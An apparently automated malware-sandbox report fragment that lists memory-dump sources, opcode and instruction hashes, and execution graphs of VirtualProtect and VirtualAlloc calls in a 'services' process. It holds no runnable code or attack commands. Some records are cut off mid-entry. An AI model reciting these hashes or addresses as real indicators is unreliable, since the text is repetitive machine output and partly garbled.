                                                                                                                                • Opcode ID: b91353160be37f3a45390756d0c2017c3e14531d184d23cd011e0f17e47ee6db
                                                                                                                                • Instruction ID: 7d4cde69f56843e8ea5eed563cca79af7cd4331e4c518398744223364142b122
                                                                                                                                • Opcode Fuzzy Hash: b91353160be37f3a45390756d0c2017c3e14531d184d23cd011e0f17e47ee6db
                                                                                                                                • Instruction Fuzzy Hash: FFC0122030E424DFD261DB64C454A263FA4EF0534071201A1F009CB1B6C51AAE00CB10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                • Instruction ID: ce0e39f97927326ba20e83f6b1635d2db8bedaaada7a6588eabc1f51c5ec3551
                                                                                                                                • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                • Instruction Fuzzy Hash: 11D09218B0F50FCDF379469160B833A61AC5F08300E62443AD45F428E1891EB6056601
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6488bc28c53537ab500aba723839fa30f787ccffec23c85d9048e4accd5f766a
                                                                                                                                • Instruction ID: a1b56a181eb73c666bd63ba03be23a27217aca3a2947a2f32d4a8bca8ed050eb
                                                                                                                                • Opcode Fuzzy Hash: 6488bc28c53537ab500aba723839fa30f787ccffec23c85d9048e4accd5f766a
                                                                                                                                • Instruction Fuzzy Hash: 88D09218B0F64BCDF2BA4696403027D159C8F61310E2A243EC06F419F1C92A7A016623
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dfd8cd8bc4b44cc5ad294ac82f7e6bb4c0071abf78f6b8a651f1fb2f4e77b82b
                                                                                                                                • Instruction ID: 53d8fafc41feae25c1b24a9d683f3ec2c611d0489520930a79b0cf682f779293
                                                                                                                                • Opcode Fuzzy Hash: dfd8cd8bc4b44cc5ad294ac82f7e6bb4c0071abf78f6b8a651f1fb2f4e77b82b
                                                                                                                                • Instruction Fuzzy Hash: 85D0C968B1F98F95F9394EC1823023925E15F80B00E62063EE85F498E2CD1E7701A201
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc8adb999e1b85d2e365de92cc0ac90185c6e4e4e5772a910a7b49549f07e749
                                                                                                                                • Instruction ID: 1678344f90dbc4051425780342c2be4f9e838e2ba8ed33a60ddca2d2654b77ca
                                                                                                                                • Opcode Fuzzy Hash: cc8adb999e1b85d2e365de92cc0ac90185c6e4e4e5772a910a7b49549f07e749
                                                                                                                                • Instruction Fuzzy Hash: 29C08C302084018FCB94EF10C018C203390EF6934032602B4C607DF2B0CB21ED00CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:4.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:6
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 14026 7ffd9b7a295e 14027 7ffd9b7a296d VirtualProtect 14026->14027 14029 7ffd9b7a2aad 14027->14029 14030 7ffd9b7a434d 14031 7ffd9b7a436f VirtualAlloc 14030->14031 14033 7ffd9b7a4485 14031->14033

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ikP.
                                                                                                                                • API String ID: 0-1166349263

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e6fda76bc0dc66545cc769383214262eb0a755dd95c558023be08034f586c73b
                                                                                                                                • Instruction ID: 64cea5e9a303c5c7abe1e03c31a45e61cb4c516549e2e8cbdd8805c9ce2ebee3
                                                                                                                                • Opcode Fuzzy Hash: e6fda76bc0dc66545cc769383214262eb0a755dd95c558023be08034f586c73b
                                                                                                                                • Instruction Fuzzy Hash: 6E52DF71A09A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD72A5DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9edfaed629f1aea4356c7ccafa42bcc1393f0f4ea7c5e879a239a2f836c58cb1
                                                                                                                                • Instruction ID: c4844c72c9422e2eff8054b5428cea92cc141f35a4014957e76605285e7a35b7
                                                                                                                                • Opcode Fuzzy Hash: 9edfaed629f1aea4356c7ccafa42bcc1393f0f4ea7c5e879a239a2f836c58cb1
                                                                                                                                • Instruction Fuzzy Hash: F142CE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7b5475d13665454536e12fe1641145daff68026449997891abb8d3c8645220c
                                                                                                                                • Instruction ID: 6b8b16f45ae6fd201de12eac411992b4cb51f5799c730e315636cf4d6bef3a0b
                                                                                                                                • Opcode Fuzzy Hash: d7b5475d13665454536e12fe1641145daff68026449997891abb8d3c8645220c
                                                                                                                                • Instruction Fuzzy Hash: D942EF71A09A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 541b8a9b45813ce709b86e4fa2d7be0472cc556e811aac1d04b512899591a72b
                                                                                                                                • Instruction ID: afbde723e0a66a74b843b3f06a0dffa6a233cf8e75af75eafcedfaeef0d6c219
                                                                                                                                • Opcode Fuzzy Hash: 541b8a9b45813ce709b86e4fa2d7be0472cc556e811aac1d04b512899591a72b
                                                                                                                                • Instruction Fuzzy Hash: FB42CE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 02fea1c748196c0f516e34dc61344caed7c432cc9c3de22b68b155a560280065
                                                                                                                                • Instruction ID: 3dade068a622027f39d83ffa92a3b976b0f2a4c7b4ab0cf4b8815668ce21744e
                                                                                                                                • Opcode Fuzzy Hash: 02fea1c748196c0f516e34dc61344caed7c432cc9c3de22b68b155a560280065
                                                                                                                                • Instruction Fuzzy Hash: 1D42EF71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 115636054e9c591f372ac51c56b6457ff7389a342779633f24692286869edde9
                                                                                                                                • Instruction ID: 5ef631e058c3f67635239f824bc1c431e6e57adc292a21729e45b30b811b29d7
                                                                                                                                • Opcode Fuzzy Hash: 115636054e9c591f372ac51c56b6457ff7389a342779633f24692286869edde9
                                                                                                                                • Instruction Fuzzy Hash: 2F42EE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cba86efc49d9d06128757b47c88d1867f5115a949273da7942e490a93bf9a7a4
                                                                                                                                • Instruction ID: a8cfcec506dd0f7a5590b5719feb1ec0bc089db8c08a25f0a358e15bbef66616
                                                                                                                                • Opcode Fuzzy Hash: cba86efc49d9d06128757b47c88d1867f5115a949273da7942e490a93bf9a7a4
                                                                                                                                • Instruction Fuzzy Hash: 5742DE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cba86efc49d9d06128757b47c88d1867f5115a949273da7942e490a93bf9a7a4
                                                                                                                                • Instruction ID: a8cfcec506dd0f7a5590b5719feb1ec0bc089db8c08a25f0a358e15bbef66616
                                                                                                                                • Opcode Fuzzy Hash: cba86efc49d9d06128757b47c88d1867f5115a949273da7942e490a93bf9a7a4
                                                                                                                                • Instruction Fuzzy Hash: 5742DE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 997d4667a7629e6768229988b512ffdb8ae48cc8c0bb6c73ca563effa89ec468
                                                                                                                                • Instruction ID: 2b3329740bf48cdd74151a52738a93643101bfd4428c5541d4a4e7e1fb130ce0
                                                                                                                                • Opcode Fuzzy Hash: 997d4667a7629e6768229988b512ffdb8ae48cc8c0bb6c73ca563effa89ec468
                                                                                                                                • Instruction Fuzzy Hash: 16A18D71A19A898FE798DF98D8657F97BE1FF55300F1002BAD04AD77E6DB7828018740

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B79C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b79c000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 8d61e8b671755d0e6674a3b96b5ab5e8b305e3a2567c2827190be53894b2b3f2
                                                                                                                                • Instruction ID: ed643e17d9c3b6062d592fb09e1dbda20f4b51d185f535cdaafd9dee47d1e889
                                                                                                                                • Opcode Fuzzy Hash: 8d61e8b671755d0e6674a3b96b5ab5e8b305e3a2567c2827190be53894b2b3f2
                                                                                                                                • Instruction Fuzzy Hash: CD518030D0874D8FDB55DFA8C885AEDBBF1FB66310F1042AAD449E3266DB74A885CB41

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 71 7ffd9b7a434d-7ffd9b7a4483 VirtualAlloc 76 7ffd9b7a4485 71->76 77 7ffd9b7a448b-7ffd9b7a44ef 71->77 76->77
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B79C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b79c000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: b1e2edec3e9cd2eb9d3ff37c2ab8b2d26b290246c9b0cd6a456651f8ea9680fd
                                                                                                                                • Instruction ID: e59d0163268fe9168d0eacf99e335fe96aadab076e7e435eae14b804e8b32836
                                                                                                                                • Opcode Fuzzy Hash: b1e2edec3e9cd2eb9d3ff37c2ab8b2d26b290246c9b0cd6a456651f8ea9680fd
                                                                                                                                • Instruction Fuzzy Hash: F0514970908A5C8FDF94EF68C845BE9BBF1FB69310F1042AAD04DE3251CB71A9858B80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ecb7d8f5c5248fe50b516c7f7443fbd39c2495c178ead63696dbe7fe3ff793f6
                                                                                                                                • Instruction ID: 5abbea3f3a00066d4c44061368f38ae8ad6c2d94ada3de6e1d775b9ff5bbbc42
                                                                                                                                • Opcode Fuzzy Hash: ecb7d8f5c5248fe50b516c7f7443fbd39c2495c178ead63696dbe7fe3ff793f6
                                                                                                                                • Instruction Fuzzy Hash: 50F16271E1965E8FDB98DF58C865BBCB7A2FF98340F4442BAD00DD32A2DA346944CB41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0945bb430f20cf4fc451a4d58a93b5a9f9b8665ee7c9eb96e1ede76c969ad6db
                                                                                                                                • Instruction ID: 32b152944612dd72ee755398fc8c07bc058460fdd3e791b760d541b6480c6636
                                                                                                                                • Opcode Fuzzy Hash: 0945bb430f20cf4fc451a4d58a93b5a9f9b8665ee7c9eb96e1ede76c969ad6db
                                                                                                                                • Instruction Fuzzy Hash: 7C713915B2EB4E4AE3696A7C08652B976C2EF85B15F26027DE4DFC32E7DC1C69034281
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbb35d979ea4a49cfe714e04ee130edb8f6afad85717d2100918f1e17355038e
                                                                                                                                • Instruction ID: fbb38878675d0910e22ef7d9c85b8785d043e78e0f0c74d9c1e7212dd2fb2845
                                                                                                                                • Opcode Fuzzy Hash: dbb35d979ea4a49cfe714e04ee130edb8f6afad85717d2100918f1e17355038e
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09f8b12c4c60efa117e91942d6f8b829233b56f32586ec26350072fd37c00845
                                                                                                                                • Instruction ID: 25d006bf9d9a41e8d42cbc5450464443c6549ab95b8513ecd78fb30143de358d
                                                                                                                                • Opcode Fuzzy Hash: 09f8b12c4c60efa117e91942d6f8b829233b56f32586ec26350072fd37c00845
                                                                                                                                • Instruction Fuzzy Hash: 58012C3090964D8FCF85DF64C859AEA7BF0FF69304F11059AE419D72A1D734AA54CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27075d54b2eed881d37b41f1a7e285fc9d13aaa23efee9fa6953b5d69f6af546
                                                                                                                                • Instruction ID: 69cf48f4844cdf9f9eeb8205fa2d572d7b31a6e1987d43558eeab74894d87d74
                                                                                                                                • Opcode Fuzzy Hash: 27075d54b2eed881d37b41f1a7e285fc9d13aaa23efee9fa6953b5d69f6af546
                                                                                                                                • Instruction Fuzzy Hash: A5016D30948A4D8FCF85EF54C898AEA7BB1FF69301F0501EAD409C71A1DB35EA94CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f60f5fa282b96ac0b564c4387b5b106c66f39f9922249b454f16b64966556fc9
                                                                                                                                • Instruction ID: 6121cc6cfdf7800cd0b13eeeea26a7165c4f491ef1809142ea2fb47a828a8529
                                                                                                                                • Opcode Fuzzy Hash: f60f5fa282b96ac0b564c4387b5b106c66f39f9922249b454f16b64966556fc9
                                                                                                                                • Instruction Fuzzy Hash: 9F01C930914A4D9FDF84EF58C859AEA7BF1FF68305F1005AAE80DD7260DB31A594CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b6e19630e36310bca4057018f63a3de204a4d5604ef0a86d64c97c5a8454fe64
                                                                                                                                • Instruction ID: 52038b5e852814fbddff2b8248632864e6fc64374c92e2c0033579394de0b8e8
                                                                                                                                • Opcode Fuzzy Hash: b6e19630e36310bca4057018f63a3de204a4d5604ef0a86d64c97c5a8454fe64
                                                                                                                                • Instruction Fuzzy Hash: F801E835E0962D8BDB61DAA9D8186EEB3F1FF48310F104676C419E22A0DA756E15CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2f48c1b942be45e1b388f21d32ad2e4000991cd0f0e3a9ae4d38f1c606566007
                                                                                                                                • Instruction ID: bc0b75cb185ee6771e2f537770435261fbab041016eff62c713091d4e96844a9
                                                                                                                                • Opcode Fuzzy Hash: 2f48c1b942be45e1b388f21d32ad2e4000991cd0f0e3a9ae4d38f1c606566007
                                                                                                                                • Instruction Fuzzy Hash: FCF04F30A0864DDFCF45DF58D494AEA7BB0FF98305F1005AAE409D3160CB31A694CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c4eb82aa514ce425112e84dcdb2091746e79800165bdd970e4566c7abdb8bd7f
                                                                                                                                • Instruction ID: 07889d2d95ba576d037870e959dd20b0dbb211b5c78663632c59e54500e494f5
                                                                                                                                • Opcode Fuzzy Hash: c4eb82aa514ce425112e84dcdb2091746e79800165bdd970e4566c7abdb8bd7f
                                                                                                                                • Instruction Fuzzy Hash: F5F09C7091494DCFDF84EF58C858AEE77F1FB68305F10455AA41DD3264DB719A54CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 47aedc0da61b093dfe4ae6a87e754e2aeec25086e20fb1e2737a7a4d90ae2c07
                                                                                                                                • Instruction ID: a04488f30498e3eb23a7d9c21c6b32d5998267a8f534cc7aa42c00b0e61b6512
                                                                                                                                • Opcode Fuzzy Hash: 47aedc0da61b093dfe4ae6a87e754e2aeec25086e20fb1e2737a7a4d90ae2c07
                                                                                                                                • Instruction Fuzzy Hash: 36F0BD3091490D9FDF84EF58C458AAA7BF1FF68305F10459AA41DD3160DB71AA94CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27230450e8a7e77f2c2cd74ce05a9b3636f0261b2f7c2e8b76a0bad6b9540f09
                                                                                                                                • Instruction ID: f8aa6ec69c8102d64956de02404d871d271d35841d8ff1dfc3c9a616750478e9
                                                                                                                                • Opcode Fuzzy Hash: 27230450e8a7e77f2c2cd74ce05a9b3636f0261b2f7c2e8b76a0bad6b9540f09
                                                                                                                                • Instruction Fuzzy Hash: 88F06770E1A76DCEEBA09AA5885C7FDB6A0AF18701F1146B6D40D961B1DB386A81CE04

Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 6
Total number of Limit Nodes: 0
execution_graph 18144 7ffd9b78295e 18145 7ffd9b78296d VirtualProtect 18144->18145 18147 7ffd9b782aad 18145->18147 18148 7ffd9b78434d 18149 7ffd9b78436f VirtualAlloc 18148->18149 18151 7ffd9b784485 18149->18151

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
